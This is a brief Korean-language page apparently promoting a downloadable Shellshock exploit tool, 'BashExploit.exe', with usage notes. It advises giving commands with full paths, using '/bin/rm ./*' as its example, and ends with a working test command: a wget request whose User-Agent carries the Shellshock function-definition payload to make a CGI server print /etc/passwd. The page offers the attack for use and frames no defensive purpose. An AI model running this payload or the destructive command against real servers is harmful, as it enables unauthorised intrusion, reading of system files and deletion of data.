Bash Exploit

Bash shell Exploit

Intro

For more information, see http://www.exploit-db.com/exploits/34765/

Download

BashExploit.exe

Program

Command 에서 사용할 명령은 반드시 Full 경로로 입력할 것.

rm ./*

로 하면 안되고

/bin/rm ./*

처럼 정확히 명시해야 함.

명령이 정상적으로 서버의 bash 에 의해 수행되었는지는, 직접 확인해야 함.

 - 원격으로는 확인할 방법이 없음.

TEST CODE;

wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://10.248.2.15/cgi-bin/testing.cgi